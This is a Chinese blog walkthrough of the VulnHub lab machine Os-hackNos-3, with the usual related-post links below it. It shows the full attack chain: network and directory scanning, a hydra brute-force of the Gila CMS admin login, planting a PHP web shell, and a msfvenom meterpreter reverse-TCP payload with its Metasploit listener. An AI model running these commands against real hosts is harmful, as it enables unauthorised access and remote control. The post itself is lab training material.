Os-hackNos-3靶机

已于 2024-07-14 18:24:58 修改
阅读量885 收藏 11
点赞数 9
文章标签: 网络安全 安全 web安全 github 开源
于 2024-07-14 18:24:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61995767/article/details/140420306
版权

靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/

一、信息收集

步骤一:导入并配置靶机为桥接模式而后开启...获取其MAC地址信息...如下:

步骤二:使用nmap进行网络扫描,发现目标192.168.7.186为入侵目标靶机...

nmap 192.168.7.0/24

步骤三:端口扫描

nmap -sV  -p- 192.168.7.186

 步骤四:使用dirb工具对该网站进行目录扫描,发现/scripts/路径并访问...并无实际利用点...

dirb http://192.168.7.186/

步骤五:访问这几个文件无果后回到站点主页面,发现 You need extra WebSec在其站点后面添加路径/websec/发现是一套CMS站点...

得到了邮箱地址 contact@hacknos.com

步骤六:使用dirb对http://192.168.7.186/websec/进行目录扫描

dirb ​http://192.168.7.186/websec/​

拼接/websec/admin,发现一个登录点

在title处发现Gila CMS字样...并搜索发现为一套开源的CMS... 

步骤七:使用搜索引擎检索下Gila CMS的可利用漏洞找到以下两个漏洞....文件包含漏洞需要登录后台,所以接下来的思路就是尝试弱口令爆破....

步骤八:使用cewl工具对其网站信息进行收集并制作成字典...

cewl http://192.168.7.186/websec/ > passwd.txt

 步骤九:使用九头蛇暴力破解

hydra -l contact@hacknos.com -P passwd.txt 192.168.7.186 http-post-form "/websec/login:username=^USER^&password=^PASS^:Wrong email or password" -V

得到账号密码 contact@hacknos.com Securityx

步骤十:在Content—>File Manager处进入tmp目录编辑.htaccess文件,将里面的内容全部删除点击save

进入/tmp/media_thumb/目录下新建一个文件shell.php,并写入一句话木马

访问http://192.168.7.249/websec/tmp/media_thumb/shell.php

蚁剑连接

二、反弹shell

步骤十一:打开瑞士军刀监听端口

在kali中启动mafconsole并进去到监听模式下...并打开浏览器访问shelll.php进行shell反弹

#MSF生成PHP木马
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.7.250 LPORT=4455 R > shelll.php 
chmod 777 shelll.php

成功生成shelll.php文件

随后在kali开启一个服务

浏览器访问192.168.7.250:8000(192.168.7250为kali的IP)

在蚁剑中打开终端进行远程下载

#kali中启动msfconsole接受Shell反弹
use exploit/multi/handler 
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.7.250
set LPORT 4455

浏览器访问shelll.php

成功反弹

嗷嗷~嗷嗷~
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
os-hacknos-3靶机
weixin_73074638的博客
07-13 200
看到开启两个端口访问web服务。
vulnhub靶机 Os-hackNos-1
qq_52178795的博客
06-16 142
vulnhub靶机 Os-hackNos-1打靶
kali 攻击靶机Os-HackNos-1
weixin_52525624的博客
02-21 1967
实验主机:Os-hackerNos靶机一台/Kali linux攻击机一台 实验网络:桥接网络 实验目标:获取靶机的Root权限 难易程度:简单 前期工作: 1:下载Virtualbox虚拟化软件 下载地址:https://www.virtualbox.org/wiki/Downloads 2:下载目标靶机并导入Virtualbox 下载地址:hackNos: Os-hackNos ~ VulnHub 将Os-hackNos-1.ova下载下来之后打开Virtualbox按下快捷键Ctrl
Vulnhub靶机HACKNOS_ OS-HACKNOS-3
LainWith的博客
01-16 1971
目录介绍信息收集主机发现主机信息探测网站探测目录扫描访问子目录爆破登录站点登录网站Getshell方法1:命令执行-失败方法2:msf-失败方法3:冰蝎第一个Flag提权获取flag2查找 suid 文件-cpulimit提权通过dock提权参考 介绍 系列: hackNos 发布日期: 2019年12月14日 难度: 中级 Flag : 一个普通用户的,一个根用户的 学习:漏洞利用、web攻击、枚举、权限提升 靶机地址:https://www.vulnhub.com/entry/hacknos-os-ha
vulnhub靶机Os-hackNos-1
mingyqf的博客
06-22 1008
靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401KALI: 192.168.59.141/24 靶机:192.168.59.146/24目标获取2个flagPS:(Vulnhub靶机检测不到IP 修改完ip 重启就ok了) 环境搭建成功! 发现服务: 用kali中的whatweb来探测一下Drupal的版本,看是否有相应的漏洞,发现是Drupal7 在GitHub上面查找一下是否有该框架的漏洞以及exp,或者利用msf搜索,我这利用msf
Os-HackNos-1靶机渗透过程笔记
qq_51637038的博客
04-02 159
用hackbar向webshell传递post参数(反弹shell的语句我还不太懂怎么写出来的,照搬的网上的语句)rm /tmp/f;在开始渗透前遇到nmap扫不到靶机ip的情况,查找资料后发现问题出在靶机的网关设置有问题,需要先修改interfaces文件中的网关才能使靶机联网(应该是都会遇到这个问题的)其中已知172为kali的ip,54为物理机ip,1为网关ip,故可知192.168.43.36是靶机的ip。查到漏洞CVE-2018-7600,影响范围包括了Drupal 6.x,7.x,8.x版本。
Os-hackNOs1靶机测试
weixin_58729813的博客
03-21 148
本文主要是对vulnhub靶机Os-hackNOs1进行测试,打靶机能将够我们学习到东西运用起来,并且可以反思到哪些知识点没学好,进而去巩固和学习.靶机测试接近于实战,靶机测试玩得好 实战不会太差的。
vulhub - Os-hackNos-1
在下小黄的博客
09-09 520
一、环境搭建:Os-hackNos-1靶机 实验主机:kali linux 2021 虚拟机(VM) 实验靶机Os-hackNos-1靶机(VM) 实验网络:NAT模式 实验难度:简单 flag:1.普通用户的user.txt;2.root用户的user.txt 技能:漏洞利用 | web应用 | 暴力破解 | 权限提升 二、信息收集: 主机发现: 确认自己的信息: ifconfig 探测网段存活主机: nmap -sP 192.168.138.0/24 端口扫描: 探测操作系统及软
Vulnhub靶机练习笔记-Os-hackNos-1
2301_80115097的博客
04-10 825
现在提权的思路就是先下载靶机上的passwd,然后添加一个有root权限的用户到构造的passwd文件中,然后使用wget -O把构造的passwd内容重定向输入到原本的/etc/passwd中。dirb也扫一边,貌似dirb扫到的结果比dirsearch多,所以在实战的时候可以用多个不同的工具进行信息收集,这样才更全面。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。访问drupal目录,是一个登录界面,弱口令登录测试无果,换换别的思路。
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8350
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
极速下载!青苹果系统Win7旗舰版:稳定安全
lihuiyun184291的博客
07-25 426
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 496
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
2024安全大模型技术与市场研究报告
最新发布
cybtec的博客
07-25 458
2024安全大模型技术与市场研究报告
sqlmap进行os-shell需要靶机开启3306端口和MYSQL远程登陆吗
07-13
对于SQLMap进行OS shell(操作系统级别的命令执行)攻击,通常情况下需要满足以下两个条件: 1. 目标靶机上的MySQL服务需要启用远程登录功能,允许从远程主机连接。这通常涉及修改MySQL配置文件(如`my.cnf`或`my.ini`),确保`bind-address`参数设置为允许远程连接(通常为`0.0.0.0`)或者注释掉该参数。 2. 目标靶机上的MySQL服务需要监听在一个网络可访问的端口上,通常是默认的3306端口。 如果目标靶机满足上述条件,SQLMap就可以通过与目标数据库建立连接并执行操作系统命令,从而实现OS shell攻击。 然而,值得注意的是,远程登录MySQL并执行操作系统命令是一种非常危险的行为,可能导致系统的安全风险。在真实环境中,为了保护系统安全,通常不会将MySQL服务直接暴露在公共网络上,或者限制只允许特定IP地址进行远程登录。 因此,在进行SQL注入测试时,请确保已经获得合法的授权,并且目标靶机是在受控环境中进行测试。同时,遵守法律法规和道德规范,仅在合法授权范围内进行测试和攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值